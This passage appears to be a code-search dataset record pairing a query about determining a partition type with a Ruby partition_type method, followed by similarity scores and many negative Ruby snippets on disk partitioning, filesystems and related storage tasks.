"0.5416197",
"0.54006267",
"0.5396558",
"0.5388633",
"0.5384729",
"0.5381226",
"0.53789884",
"0.53789884",
"0.5377594",
"0.5363653",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212"
] |
0.6458688
|
7
|
Determine the appropriate partition type for this partition by which methods were called on it.
|
def partition_type
raise Error, "Unable to determine partition type, multiple different partitioning methods called" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1
if @from || @to
raise Error, "must call both from and to when creating a partition of a table if calling either" unless @from && @to
:range
elsif @in
:list
elsif @modulus || @remainder
raise Error, "must call both modulus and remainder when creating a partition of a table if calling either" unless @modulus && @remainder
:hash
elsif @default
:default
else
raise Error, "unable to determine partition type, no partitioning methods called"
end
end
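
A hypothetical end-to-end driver for this dispatch; the writer methods and the stubbed Error class mirror the names used in the error messages above but are otherwise assumptions, and the method body is restated so the example runs standalone.

# Hedged sketch: only partition_type's logic comes from the row above.
Error = Class.new(StandardError)

class PartitionTypeSketch
  def from(v); @from = v; end          # assumed writers wiring the ivars
  def to(v); @to = v; end
  def values_in(*v); @in = v; end
  def modulus(v); @modulus = v; end
  def remainder(v); @remainder = v; end
  def default; @default = true; end

  def partition_type
    raise Error, "Unable to determine partition type, multiple different partitioning methods called" if [@from || @to, @in, @modulus || @remainder, @default].compact.length > 1
    if @from || @to
      raise Error, "must call both from and to when creating a partition of a table if calling either" unless @from && @to
      :range
    elsif @in
      :list
    elsif @modulus || @remainder
      raise Error, "must call both modulus and remainder when creating a partition of a table if calling either" unless @modulus && @remainder
      :hash
    elsif @default
      :default
    else
      raise Error, "unable to determine partition type, no partitioning methods called"
    end
  end
end

gen = PartitionTypeSketch.new
gen.values_in 1, 2, 3
gen.partition_type # => :list

bad = PartitionTypeSketch.new
bad.modulus 4 # remainder never set
begin
  bad.partition_type
rescue Error => e
  e.message # => "must call both modulus and remainder when creating a partition of a table if calling either"
end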
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def IsPartitionable(entry)\n entry = deep_copy(entry)\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMRAID ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMMULTIPATH ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_MDPART ||\n IsRealDisk(entry)\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def get_filetype(partition) # by nelsongs\n\treturn `file -s \"#{partition}\" | awk '{print $2}'`.chomp\nend",
"def partition_types_ext\n ptr1 = MemoryPointer::new( :size_t, 1)\n error = OpenCL.clGetDeviceInfo(self, PARTITION_TYPES_EXT, 0, nil, ptr1)\n error_check(error)\n ptr2 = MemoryPointer::new( ptr1.read_size_t )\n error = OpenCL.clGetDeviceInfo(self, PARTITION_TYPES_EXT, ptr1.read_size_t, ptr2, nil)\n error_check(error)\n arr = ptr2.get_array_of_cl_device_partition_property_ext(0, ptr1.read_size_t/ OpenCL.find_type(:cl_device_partition_property_ext).size)\n arr.reject! { |e| e == 0 }\n return arr.collect { |e| PartitionEXT::new(e.to_i) }\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def disk_type\n return @disk_type\n end",
"def partition_of_nodename node\n @nodes.each do |k,v|\n return v[StatPartition].to_i if k == node\n end\n return nil\n end",
"def FSCKPartition(partition)\n if !Mode.test\n detected_fs = Storage.DetectFs(partition)\n if detected_fs == :ext2\n # label, %1 is partition\n out = Builtins.sformat(_(\"Checking partition %1\"), partition)\n UI.OpenDialog(Opt(:decorated), Label(out))\n\n Builtins.y2milestone(\"command: /sbin/e2fsck -y %1\", partition)\n SCR.Execute(\n path(\".target.bash\"),\n Ops.add(\"/sbin/e2fsck -y \", partition)\n )\n\n UI.CloseDialog\n end\n end\n\n nil\n end",
"def get_pt_type(device)\n fs_check = Mixlib::ShellOut.new(\"blkid -c /dev/null #{device}\")\n fs_check.run_command\n match = fs_check.stdout.match(/\\sPTTYPE=\\\"(.*?)\\\"/)\n match = '' if match.nil?\n\n Chef::Log.info(\"Partition type for device #{device}: #{match[1]}\")\n match[1]\nend",
"def partition_list()\nend",
"def isPartition(partition)\n partition = deep_copy(partition)\n AutoinstCommon.isValidObject(@fields, partition)\n end",
"def CheckPartition(partition)\n partition = deep_copy(partition)\n freshman = {\n :valid => false,\n :name => \"unknown\",\n :arch => \"unknown\",\n :label => Ops.get_string(partition, \"label\", \"\"),\n :fs => Ops.get_symbol(partition, \"detected_fs\", :unknown),\n :fstype => Ops.get_string(partition, \"fstype\", \"unknown\")\n }\n\n p_dev = Ops.get_string(partition, \"device\", \"error\")\n p_fsid = Ops.get_integer(partition, \"fsid\", 0)\n p_type = Ops.get_symbol(partition, \"type\", :primary)\n p_detect_fs = Ops.get_symbol(partition, \"detected_fs\", :unknown)\n\n # possible root FS\n if Builtins.contains(FileSystems.possible_root_fs, p_detect_fs)\n mt_map = {\n :ext2 => \"ext2\",\n :ext3 => \"ext3\",\n :ext4 => \"ext4\",\n :btrfs => \"btrfs\",\n :reiser => \"reiserfs\",\n :xfs => \"xfs\",\n :jfs => \"jfs\"\n }\n mount_type = Ops.get(mt_map, p_detect_fs, \"\")\n\n error_message = nil\n if !(\n error_message_ref = arg_ref(error_message);\n _RunFSCKonJFS_result = RunFSCKonJFS(\n mount_type,\n p_dev,\n error_message_ref\n );\n error_message = error_message_ref.value;\n _RunFSCKonJFS_result\n )\n Ops.set(freshman, :valid, false)\n return deep_copy(freshman)\n end\n\n # mustn't be empty and must be modular\n if mount_type != \"\" && !Builtins.contains(@non_modular_fs, mount_type)\n SCR.Execute(path(\".target.modprobe\"), mount_type, \"\")\n end\n # mount (read-only) partition to Installation::destdir\n Storage.RemoveDmMapsTo(p_dev)\n if Convert.to_boolean(\n SCR.Execute(\n path(\".target.mount\"),\n [p_dev, Installation.destdir, Installation.mountlog],\n \"-o ro\"\n )\n )\n # Is this a root partition, does /etc/fstab exists?\n if Ops.greater_than(\n SCR.Read(\n path(\".target.size\"),\n Ops.add(Installation.destdir, \"/etc/fstab\")\n ),\n 0\n )\n Builtins.y2milestone(\"found fstab on %1\", partition)\n\n fstab = []\n crtab = []\n\n fstab_ref = arg_ref(fstab)\n crtab_ref = arg_ref(crtab)\n read_fstab_and_cryptotab(fstab_ref, crtab_ref, p_dev)\n fstab = fstab_ref.value\n crtab = crtab_ref.value\n Update.GetProductName\n\n fstab = Builtins.filter(fstab) do |p|\n Ops.get_string(p, \"file\", \"\") == \"/\"\n end\n\n if Builtins.size(Ops.get_string(fstab, [0, \"spec\"], \"\")) == 0\n Builtins.y2warning(\"Cannot find / entry in fstab %1\", fstab)\n end\n\n Ops.set(\n freshman,\n :valid,\n Ops.greater_than(\n Builtins.size(Ops.get_string(fstab, [0, \"spec\"], \"\")),\n 0\n ) &&\n Storage.DeviceMatchFstab(\n p_dev,\n Ops.get_string(\n # bugzilla #304269\n # DeviceMatchFstab expects _old_ not _translated_ device\n fstab,\n [0, \"spec_old\"],\n Ops.get_string(fstab, [0, \"spec\"], \"\")\n )\n )\n )\n\n # Why this doesn't match?\n # Possible reasons:\n # - /var not mounted so hwinfo cannot translate device names\n if Ops.get_boolean(freshman, :valid, false) != true\n Builtins.y2warning(\n \"Device does not match fstab: '%1' vs. 
'%2'\",\n p_dev,\n Ops.get_string(fstab, [0, \"spec\"], \"\")\n )\n end\n if Mode.autoinst\n # we dont care about the other checks in autoinstallation\n SCR.Execute(path(\".target.umount\"), Installation.destdir)\n return deep_copy(freshman)\n end\n\n # Get installed release name\n release = OSRelease.ReleaseInformation(Installation.destdir)\n Builtins.y2debug(\"release: %1\", release)\n if release == \"?\"\n # label for an unknown installed system\n release = _(\"Unknown\")\n end\n Ops.set(freshman, :name, release)\n\n # Right architecture?\n Ops.set(\n freshman,\n :arch,\n GetArchOfELF(Ops.add(Installation.destdir, \"/bin/bash\"))\n )\n instsys_arch = GetArchOfELF(\"/bin/bash\")\n\n # `arch_valid, see bugzilla #288201\n # installed /bin/bash and the one from inst-sys are matching\n if Ops.get_string(freshman, :arch, \"unknown\") == instsys_arch\n Builtins.y2milestone(\"Architecture (%1) is valid\", instsys_arch)\n Ops.set(freshman, :arch_valid, true) \n\n # both are PPC, bugzilla #249791\n elsif Builtins.contains(\n [\"ppc\", \"ppc64\"],\n Ops.get_string(freshman, :arch, \"unknown\")\n ) &&\n Builtins.contains([\"ppc\", \"ppc64\"], instsys_arch)\n Builtins.y2milestone(\n \"Architecture for partition %1 is %2, upgrading %3\",\n p_dev,\n Ops.get_string(freshman, :arch, \"unknown\"),\n instsys_arch\n )\n Ops.set(freshman, :arch_valid, true) \n\n # Architecture is not matching\n else\n Builtins.y2milestone(\n \"Architecture for partition %1 is %2, upgrading %3\",\n p_dev,\n Ops.get_string(freshman, :arch, \"unknown\"),\n instsys_arch\n )\n Ops.set(freshman, :arch_valid, false)\n end\n\n # If architecture is not matching, the whole partition is considered to be wrong\n if Ops.get_boolean(freshman, :arch_valid, false) != true\n Builtins.y2milestone(\n \"Architecture is not valid -> the whole partition is not valid\"\n )\n Ops.set(freshman, :valid, false)\n end\n\n if IncompleteInstallationDetected(Installation.destdir)\n Builtins.y2milestone(\n \"Incomplete installation detected, partition is not valid\"\n )\n Ops.set(freshman, :valid, false)\n end\n\n Builtins.y2milestone(\n \"Partition is valid: %1, arch is valid: %2\",\n Ops.get_boolean(freshman, :valid, false),\n Ops.get_boolean(freshman, :arch_valid, false)\n )\n end\n\n # unmount partition\n SCR.Execute(path(\".target.umount\"), Installation.destdir)\n end\n end\n\n Builtins.y2milestone(\"%1 %2\", partition, freshman)\n\n deep_copy(freshman)\n end",
"def partition(predicate)\n each_operand(predicate) do |operand|\n case operand\n when Axiom::Function::Binary then partition_binary(operand)\n when Axiom::Function::Unary then partition_unary(operand)\n when Axiom::Attribute::Boolean then partition_attribute(operand)\n else\n partition_proposition(operand)\n end\n end\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def closud_type(part)\n if part.flex?\n :flexibles\n elsif part.user?\n :consumers\n else\n :producers\n end\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def MountPartition(mount_point, device, mount_type)\n if mount_type == \"\"\n # e.g. -> \"reiserfs\"\n mount_type = FileSystems.GetMountString(Storage.DetectFs(device), \"\")\n end\n\n # #223878, do not call modprobe with empty mount_type\n if mount_type == \"\"\n Builtins.y2warning(\"Unknown filesystem, skipping modprobe...\") \n # #211916, sysfs, proc are not modular\n elsif !Builtins.contains(@non_modular_fs, mount_type)\n # #167976, was broken with \"-t \", modprobe before adding it\n Builtins.y2milestone(\"Calling 'modprobe %1'\", mount_type)\n SCR.Execute(path(\".target.modprobe\"), mount_type, \"\")\n else\n Builtins.y2milestone(\n \"FS type %1 is not modular, skipping modprobe...\",\n mount_type\n )\n end\n\n error_message = nil\n if !(\n error_message_ref = arg_ref(error_message);\n _RunFSCKonJFS_result = RunFSCKonJFS(\n mount_type,\n device,\n error_message_ref\n );\n error_message = error_message_ref.value;\n _RunFSCKonJFS_result\n )\n return error_message\n end\n\n mount_type = Ops.add(\"-t \", mount_type) if mount_type != \"\"\n\n ret = Convert.to_boolean(\n SCR.Execute(\n path(\".target.mount\"),\n [\n device,\n Ops.add(Installation.destdir, mount_point),\n Installation.mountlog\n ],\n mount_type\n )\n )\n if ret\n return nil\n else\n return Convert.to_string(\n SCR.Read(path(\".target.string\"), Installation.mountlog)\n )\n end\n end",
"def type\n # If we know for sure its a backup\n if self.p_s_b == \"B\"\n return \"Backup\"\n else\n pmr = self.pmr\n param = self.to_param\n # Otherwise, try and figure out\n case param\n when pmr.primary_param\n return \"Primary\"\n when pmr.secondary_1_param\n return \"Sec 1\"\n when pmr.secondary_2_param\n return \"Sec 2\"\n when pmr.secondary_3_param\n return \"Sec 3\"\n else\n return \"Backup\"\n end\n end\n end",
"def drive_type; end",
"def drive_type\n return @drive_type\n end",
"def drive_type\n return @drive_type\n end",
"def full_format fstype, label = nil\n DebugLogger.info \"class = #{self.class.name}, method = #{__method__}\"\n delete_all_partitions unless partitions.blank?\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Creating partition #{self.kname}\"\n DiskUtils.create_partition self, 1, -1\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Find partition #{@kname}\"\n self.reload\n new_partition = self.partitions.last # Assuming new partition to be at the last index\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Formating #{@kname} to #{fstype}\"\n new_partition.format fstype and reload\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def list_partitions_with_size_and_type # by nelsongs. => list: partition size type\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\") print $1\":\"$5\":\"$6;else print $1\":\"$4\":\"$5}' | sed s/+//g`.split\nend",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition_lookup\n return @partition_lookup unless @partition_lookup.nil?\n io = _root._io\n _pos = io.pos\n io.seek(_root.sector_size)\n @_raw_partition_lookup = io.read_bytes(sector_size)\n _io__raw_partition_lookup = Kaitai::Struct::Stream.new(@_raw_partition_lookup)\n @partition_lookup = PartitionEntry.new(_io__raw_partition_lookup, self, @_root)\n io.seek(_pos)\n @partition_lookup\n end",
"def get_type; raise NotImplementedError end",
"def type\n (@type || :invoke).to_sym\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def method_for_kind!(kind)\n method = nil\n if !@method_override.nil?\n method = @method_override\n elsif kind == Springcm::Folder\n method = :folders\n elsif kind == Springcm::Document\n method = :documents\n elsif kind == Springcm::AttributeGroup\n method = :attribute_groups\n elsif kind == Springcm::HistoryItem\n method = :history\n elsif kind == Springcm::Group\n method = :groups\n elsif kind == Springcm::User\n method = :users\n else\n raise ArgumentError.new(\"Resource kind must be one of: Springcm::Document, Springcm::Folder, Springcm::AttributeGroup, Springcm::HistoryItem, Springcm::User, Springcm::Group.\")\n end\n return method\n end",
"def first_os_partition\n os_part = @partition_layout.detect { |p| p.os == true }\n return os_part if os_part\n\n # Next look for an OS in a LVM partition\n lvm_part = @partition_layout.detect { |p| p.lvm != nil }\n raise RuntimeError, 'OS and LVM partitions missing' unless lvm_part\n\n os_part = lvm_part.lvm.volumes.detect { |p| p.os == true }\n raise RuntimeError, 'No partitions marked as OS' unless os_part\n\n return os_part\n end",
"def partition_type_hex kname\n # Return Hex value of the partition type.Reliable compared to pure tex comparison.\n # Reference: https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/5/html/Installation_Guide/ch-partitions-x86.html#tb-partitions-types-x86\n if DEBUG_MODE or Platform.ubuntu? or Platform.fedora?\n command = \"udevadm\"\n params = \" info --query=property --name=#{kname}\"\n end\n udevadm = CommandsExecutor.new command, params\n udevadm.execute false, false # None blocking and not debug mode\n raise \"Command execution error: #{udevadm.stderr.read}\" if not udevadm.success?\n udevadm.result.each_line do |line|\n line.squish!\n key = 'ID_PART_ENTRY_TYPE'\n _key, value = line.split '='\n return value.hex if _key.eql? key\n end\n end",
"def part_title_by_type(resource_type)\n if self.type == resource_type\n self.title\n elsif self.has_part && self.has_part.type == resource_type\n self.has_part.title\n else\n nil\n end\n end",
"def partitions_for(topic=nil)\n if topic.class == String && block_given?\n @j_del.java_method(:partitionsFor, [Java::java.lang.String.java_class,Java::IoVertxCore::Handler.java_class]).call(topic,(Proc.new { |ar| yield(ar.failed ? ar.cause : nil, ar.succeeded ? ar.result.to_a.map { |elt| elt != nil ? JSON.parse(elt.toJson.encode) : nil } : nil) }))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling partitions_for(#{topic})\"\n end",
"def IsResizable(part)\n part = deep_copy(part)\n ret = FileSystems.IsResizable(:unknown)\n if !Arch.s390 && Partitions.IsResizable(Ops.get_integer(part, \"fsid\", 0)) ||\n Ops.get_symbol(part, \"type\", :none) == :lvm\n if Ops.get_integer(part, \"fsid\", 0) == Partitions.fsid_swap\n ret = FileSystems.IsResizable(:swap)\n else\n if !(Ops.get_symbol(part, \"type\", :none) == :lvm &&\n Ops.get_symbol(part, \"used_fs\", :unknown) == :vfat)\n ret = FileSystems.IsResizable(\n Ops.get_symbol(part, \"used_fs\", :unknown)\n )\n end\n end\n end\n ret[\"device\"] = (Partitions.IsResizable(part.fetch(\"fsid\",0)) &&\n !part.fetch(\"device\",\"\").start_with?(\"/dev/dasd\")) ||\n\t\t part.fetch(\"type\",:none)==:lvm\n Builtins.y2milestone(\"IsResizable part:%1 ret:%2\", part, ret)\n deep_copy(ret)\n end",
"def part_of_title_by_type(resource_type)\n if self.type == resource_type\n self.title\n elsif self.is_part_of && self.is_part_of.type == resource_type\n self.is_part_of.title\n else\n nil\n end\n end",
"def filesystem_type(host)\n case host['platform']\n when %r{aix}\n 'jfs2'\n when %r{el-|centos|fedora|sles|debian|ubuntu}\n 'ext3'\n else\n # TODO: Add Solaris and OSX support, as per PUP-5201 and PUP-4823\n fail_test(\"Unable to determine a standard filesystem table type for #{host['platform']}\")\n end\n end",
"def df_type\n raise NoMethodError, \"#{__method__} not defined for #{self.class.name}\"\n end",
"def kind\n raise NotImplementedError\n end",
"def default_synced_folder_type(machine, plugins)\n ordered = []\n\n # First turn the plugins into an array\n plugins.each do |key, data|\n impl = data[0]\n priority = data[1]\n\n ordered << [priority, key, impl]\n end\n\n # Order the plugins by priority\n ordered = ordered.sort { |a, b| b[0] <=> a[0] }\n\n # Find the proper implementation\n ordered.each do |_, key, impl|\n return key if impl.new.usable?(machine)\n end\n\n return nil\n end",
"def partition_left_tautology?\n partition.left.equal?(Axiom::Function::Proposition::Tautology.instance)\n end",
"def journal_task_type\n journal.journal_task_types.find_by(kind: self.class.name)\n end",
"def type\n rank.first\n end",
"def os_type\n vm.storage_profile.os_disk.os_type\n end",
"def partition_used(partition)\n # Return magic number if in test_mode to prevent syscall\n return '128' if @test_mode\n b = ' ' * 128\n syscall(137, partition, b)\n a = b.unpack('QQQQQ')\n [a[2] * blocks_per_kilobyte, a[4] * blocks_per_kilobyte]\n end",
"def type_specific_part\n return @type_specific_part unless @type_specific_part.nil?\n io = type_specific_part_raw_with_io._io\n _pos = io.pos\n io.seek(0)\n case common_part.header_type\n when 8\n @type_specific_part = TypeSpecificPartType8.new(io, self, @_root)\n when 9\n @type_specific_part = TypeSpecificPartType9.new(io, self, @_root)\n end\n io.seek(_pos)\n @type_specific_part\n end",
"def get_1st_partition(device)\n # Resolves the real device name (ex. /dev/sdg)\n Chef::Log.info(\"Getting 1st partition for device: #{device}\")\n fs_check = Mixlib::ShellOut.new(\"lsblk -ln -o Name #{device}|awk 'NR==2'\")\n fs_check.run_command\n partition = \"/dev/\" + fs_check.stdout.strip\n Chef::Log.info(\"1st partition for device: #{device} is: #{partition}\")\n partition\nend",
"def to_detect_type_by(name, &block)\n Reflection.to_detect_type_by(name, &block)\n end",
"def kind\n # returns nil, overridden and returning :question, :problem, etc. in sublcass\n end",
"def partition(&block)\n return to_enum :partition unless block\n\n ary_T = []\n ary_F = []\n self.each{|*val|\n if block.call(*val)\n ary_T.push(val.__svalue)\n else\n ary_F.push(val.__svalue)\n end\n }\n [ary_T, ary_F]\n end",
"def column_type\n object.class.scaffold_column_type(@method_name)\n end",
"def type\n @type ||= calculate_type\n end",
"def GetPartitionInfo\n partition = []\n\n if Stage.cont\n partition = EvaluateFreeSpace(0) # free spare already checked during first part of installation\n elsif Mode.update\n partition = EvaluateFreeSpace(15) # 15% free spare for update/upgrade\n elsif Mode.normal\n partition = EvaluateFreeSpace(5) # 5% free spare for post installation # Stage::initial ()\n else\n partition = get_partition_info\n end\n Builtins.y2milestone(\n \"INIT done, SpaceCalculation - partitions: %1\",\n partition\n )\n\n @info_called = true\n @partition_info = deep_copy(partition) # store partition_info\n\n deep_copy(partition)\n end",
"def type\n raise NotImplementedError\n end",
"def part_type=(value)\n\n end",
"def type\n\t\traise NotImplementedError\n\tend",
"def dir_for(type) self.slice_paths[type].first end",
"def get_type\n\n end",
"def partition(filters={})\n input, output = self.input, self.output\n filters.each_pair do |filter_key, f|\n if f.call(input, output)\n return filter_key\n end\n end\n nil\n end",
"def type\n self.class.to_s.split('::').last.downcase.to_sym\n end",
"def shuffle_type_is_appropriate(params)\n @shuffle_type = :shuffle\n @shuffle_type = slug_to_snakecase_symbol(params[:type]) if params.has_key?(:type)\n\n shuffle_type_defined = Shuffler.methods(false).include? @shuffle_type\n\n # Revert to the default if necessary.\n @shuffle_type = :shuffle unless shuffle_type_defined\n\n shuffle_type_defined\n end",
"def rectype\n part.rectype if part\n end",
"def definition; Mrowka::Tasks[self.type.to_sym]; end",
"def partition_selector\n @subhash = {}\n @filters = {}\n\n partition_selector_hash @selector, []\n end",
"def type\n\t\t\traise NotImplementedError\n\t\tend",
"def bootloader_partitions\n raise RuntimeError, \"Not implemented in base class\"\n end",
"def type\n if is_name_new?; :name_new\n elsif is_name_firstupdate?; :name_firstupdate\n elsif is_name_update?; :name_update\n elsif is_pubkey_hash?; :pubkey_hash\n elsif is_pubkey?; :pubkey\n elsif is_multisig?; :multisig\n elsif is_script_hash?; :script_hash\n elsif is_op_return?; :op_return\n else; :unknown\n end\n end",
"def type\n self.class.name.split(':').last.downcase\n end",
"def list_swap_partitions_with_type_and_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5\":\"$6;else {if ($5==\"82\") print $1\":\"$4\":\"$5}}' | sed s/+//g`.chomp.split\nend",
"def determine_resource_type( rt_overrides, solr_doc )\n\n # extract the resource type from the SOLR document\n resource_type = solr_doc.at_path( 'object_type_facet[0]' )\n # check to see if we have an override specified\n resource_type = check_for_resource_type_override( rt_overrides,resource_type, solr_doc )\n # ensure we have identified one\n if resource_type.nil?\n puts \"ERROR: unable to determine resource type\"\n return nil\n end\n\n # check it is valid\n\n # initialize the resource types list if it is empty\n @valid_resource_types = ResourceTypesService.authority.all.map { |e| e[:label] } if @valid_resource_types.empty?\n\n if @valid_resource_types.include?( resource_type )\n return resource_type\n else\n case resource_type\n when 'Conference Paper'\n return 'Conference Proceeding'\n when 'Article Preprint'\n return 'Article'\n when 'Chapter in an Edited Collection'\n return 'Part of Book'\n else\n puts \"ERROR: unsupported resource type: #{resource_type}\"\n return nil\n end\n end\n end",
"def type_klass; end",
"def disk_type=(value)\n @disk_type = value\n end",
"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def default_synced_folder_type(machine, plugins)\n ordered = []\n\n # First turn the plugins into an array\n plugins.each do |key, data|\n impl = data[0]\n priority = data[1]\n\n ordered << [priority, key, impl]\n end\n\n # Order the plugins by priority. Higher is tried before lower.\n ordered = ordered.sort { |a, b| b[0] <=> a[0] }\n\n allowed_types = machine.config.vm.allowed_synced_folder_types\n if allowed_types\n ordered = allowed_types.map do |type|\n ordered.find do |_, key, impl|\n key == type\n end\n end.compact\n end\n\n # Find the proper implementation\n ordered.each do |_, key, impl|\n return key if impl.new.usable?(machine)\n end\n\n return nil\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def primary_model\n case params[:retrieval_type]\n when 'stored_file'\n NfsStore::Manage::StoredFile\n when 'archived_file'\n NfsStore::Manage::ArchivedFile\n else\n raise FphsException, 'No retrieval_type set'\n end\n end",
"def method_type selector\n case selector\n when '.', nil then :both\n when '#' then :instance\n else :class\n end\n end",
"def method_type selector\n case selector\n when '.', nil then :both\n when '#' then :instance\n else :class\n end\n end",
"def get_key_type()\n if @metadata[:key_type] == nil\n # Choose a compatible type for the note already chosen (if there is one).\n if @metadata[:key_note] == :cb || @metadata[:key_note] == :gb || @metadata[:key_note] == :db\n self.key_type(:major)\n elsif @metadata[:key_note] == :gs || @metadata[:key_note] == :ds || @metadata[:key_note] == :as\n self.key_type(:minor)\n else\n # No constraint- choose any. (Both are valid for this key note).\n self.key_type([:major, :minor].choose)\n end\n end\n return @metadata[:key_type]\n end",
"def type\n self_class.to_s.to_sym\n end",
"def physical_type\n provider.physical_type\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def type\n klass = self.class.name\n if sep = klass.rindex('::')\n klass[(sep+2)..-1]\n else\n klass\n end.underscore.to_sym\n end",
"def provisioning_step_type\n return @provisioning_step_type\n end",
"def determine_method_class(method)\n method = method.to_s\n \"Highcharts::#{base_options.include?(method) ? 'Base' : default_options.include?(method) ? method.capitalize : custom_options[method]}\"\n end",
"def drive_type\n fetch('vehicle.drive_types')\n end",
"def partitioned_state\n super\n end",
"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} 